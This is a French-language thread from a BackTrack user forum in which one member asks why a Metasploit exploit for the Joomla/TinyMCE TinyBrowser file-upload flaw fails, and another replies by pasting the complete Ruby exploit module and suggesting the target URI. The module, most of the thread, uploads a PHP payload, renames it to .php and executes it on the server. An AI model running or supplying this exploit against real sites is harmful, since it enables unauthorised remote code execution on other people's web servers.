Index du Forum

communauté marocaine des utilisateurs de backtrack
 
 Index du ForumFAQRechercherS’enregistrerConnexion
:: Problème d'utilisation de la faille joomla tinybrowser . ::

 
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Backtrack 5 -> Bugs et erreurs
Sujet précédent :: Sujet suivant  
Auteur Message
orion


Hors ligne

Inscrit le: 26 Mai 2012
Messages: 15

MessagePosté le: Sam 26 Mai - 20:50 (2012)    Sujet du message: Problème d'utilisation de la faille joomla tinybrowser . Répondre en citant

Bonjours;


Suite a la découverte d'une faille joomla tinybrowers j'ai essaye de l'exploiter pour apprendre a utiliser joomscan pour détecter la faille et metasploit pour l'exploit Smile
Seulement lorsque je rentre mes paramètre pour l'exploit j'ai un l'erreur "error retrieving obfuscation code"
J'ai essayé de le faire aussi sous armitage pour éviter de rentrer toutes les commande mais j'ai toujours la même erreur .
L'exploit pour fonctionner me demander URI qui est pas default "/"


J’espère que quelqu'un pourra m'aider Smile





Revenir en haut
Publicité






MessagePosté le: Sam 26 Mai - 20:50 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Inf3rnus


Hors ligne

Inscrit le: 10 Mai 2012
Messages: 49

MessagePosté le: Sam 26 Mai - 21:02 (2012)    Sujet du message: Problème d'utilisation de la faille joomla tinybrowser . Répondre en citant

c'est une faille qui perme un upload tu inclus bien un fichier a upload ?
_________________


Revenir en haut
orion


Hors ligne

Inscrit le: 26 Mai 2012
Messages: 15

MessagePosté le: Sam 26 Mai - 21:42 (2012)    Sujet du message: Problème d'utilisation de la faille joomla tinybrowser . Répondre en citant

Je vois pas comment je peux upload mon fichier

Revenir en haut
Inf3rnus


Hors ligne

Inscrit le: 10 Mai 2012
Messages: 49

MessagePosté le: Sam 26 Mai - 22:54 (2012)    Sujet du message: Problème d'utilisation de la faille joomla tinybrowser . Répondre en citant

Alors je fais pas vraiment d'exploitation mais en cherchant un peu si j'ai bien compris ta faille se trouve sur un plugin joomla ayant pour role la gestion et securisation des upload a priroi une faille remontant a 2009

En faisant une recherche a partir de

Code:
 error retrieving obfuscation code


Avec mon meilleur pote google

Joomla 1.5.12 TinyBrowser File Upload Code Execution

This Metasploit module exploits a vulnerability in the TinyMCE/tinybrowser plugin. This plugin is not secured in version 1.5.12 of joomla and allows the upload of files on the remote server. By renaming the uploaded file this vulnerability can be used to upload/execute code on the affected system.

L'exploit

Code:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Kleophatra v0.1.5 'TinyBrowser' File Upload Code Execution (meta)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : File Upload Code Execution (via MetaSploit3)
# Tested on : [Windows XP sp3 FR]
##
# Download :[http://releases.kleophatra.org/stables/0.1.5/kleophatra-0.1.5.zip]
##
# $Id: kleo_tinybrowser.rb | 2011-06-02 22:55  | KedAns-Dz $
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking

   include Msf::Exploit::Remote::HttpClient

   def initialize(info = {})
      super(update_info(info,
         'Name'           => 'Kleophatra <=0.1.5 TinyBrowser File Upload Code Execution',
         'Description'    => %q{
         This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
        By renaming the uploaded file this vulnerability can be used to upload/execute
        code on the affected system.
         },
         'Author'         => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],
         'License'        => MSF_LICENSE,
         'Version'        => '1.0',
         'References'     =>
            [
            ['URL', 'Not Olden !'],
          ],
         'Privileged'     => false,
         'Payload'        =>
            {
             'DisableNops' => true,
             'Compat'      =>
                {
                   'ConnectionType' => 'find',
                },
             'Space'       => 1024,
             },
         'Platform'       => 'php',
         'Arch'           => ARCH_PHP,
         'Targets'        => [[ 'Automatic', { }]],
         'DisclosureDate' => '08/05/2011',
         'DefaultTarget'  => 0))

         register_options(
             [
                  OptString.new('URI', [true, "Kleophatra directory path", "/"]),
             ], self.class)
   end

   def check
      uri = ''
      uri << datastore['URI']
      uri << '/' if uri[-1,1] != '/'
      uri << 'lib/third_party/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
      res = send_request_raw(
         {
            'uri' => uri
         }, 25)

      if (res and res.body =~ /flexupload.swf/)
         return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
   end


   def retrieve_obfuscation()

   end


   def exploit

      cmd_php = '<?php ' + payload.encoded + '?>'

      # Generate some random strings
      cmdscript   = rand_text_alpha_lower(20)
      boundary    = rand_text_alphanumeric(6)

      # Static files
      directory    = '/media/uploads/photos'
      uri_base    = ''
      uri_base << datastore['URI']
      uri_base << '/' if uri_base[-1,1] != '/'
      uri_base << 'lib/third_party/tiny_mce/plugins/tinybrowser'

      # Get obfuscation code (needed to upload files)
      obfuscation_code = nil

      res = send_request_raw({
         'uri'     => uri_base + '/upload.php?type=file&folder='
      }, 25)

      if (res)

         if(res.body =~ /"obfus", "((\w)+)"\)/)
            obfuscation_code = $1
            print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
         else
            print_error("Error retrieving obfuscation code!")
            return
         end
      end



      # Upload shellcode (file ending .ph.p)
      data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
      data << "#{cmdscript}.ph.p\r\n--#{boundary}"
      data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
      data << "Content-Type: application/octet-stream\r\n\r\n"
      data << cmd_php
      data << "\r\n--#{boundary}--"

      res = send_request_raw({
         'uri'     => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
         'method'  => 'POST',
         'data'    => data,
         'headers' =>
         {
            'Content-Length' => data.length,
            'Content-Type'    => 'multipart/form-data; boundary=' + boundary,
         }
      }, 25)

      if (res and res.body =~ /File Upload Success/)
         print_status("Successfully uploaded #{cmdscript}.ph.p")
      else
         print_error("Error uploading #{cmdscript}.ph.p")
      end


      # Complete the upload process (rename file)
      print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
      res = send_request_raw({
         'uri'     => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
      })


      # Rename the file from .ph.p to .php
      res = send_request_cgi(
         {
            'method'    => 'POST',
            'uri'       => uri_base + '/edit.php?type=file&folder=',
            'vars_post' =>
            {
               'actionfile[0]' => "#{cmdscript}.ph.p",
               'renameext[0]'   => 'p',
               'renamefile[0]' => "#{cmdscript}.ph",
               'sortby' => 'name',
               'sorttype' => 'asc',
               'showpage' => '0',
               'action' => 'rename',
               'commit' => '',
            }
         }, 10)

      if (res and res.body =~ /successfully renamed./)
         print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
      else
         print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
      end


      # Finally call the payload
      print_status("Calling payload: #{cmdscript}.php")
      uri = ''
      uri << datastore['URI']
      uri << '/' if uri[-1,1] != '/'
      uri << directory + cmdscript + ".php"
      res = send_request_raw({
         'uri'   => uri
      }, 25)

   end

end

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================


Source ICI

Donc au vue de tout ca et de
Citation:
L'exploit pour fonctionner me demander URI qui est pas default "/"


Je te dirais de remplacé dans ta commande msf l'uri par défaut "/" par l'url de la page upload de ton site faillible par exemple http://tonsitefaillible.com/upload.php

Fait donc un retour apres avoir essayer voir si ca fonctionne Okay
_________________


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 20:24 (2017)    Sujet du message: Problème d'utilisation de la faille joomla tinybrowser .

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Backtrack 5 -> Bugs et erreurs Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation

© Alien 2012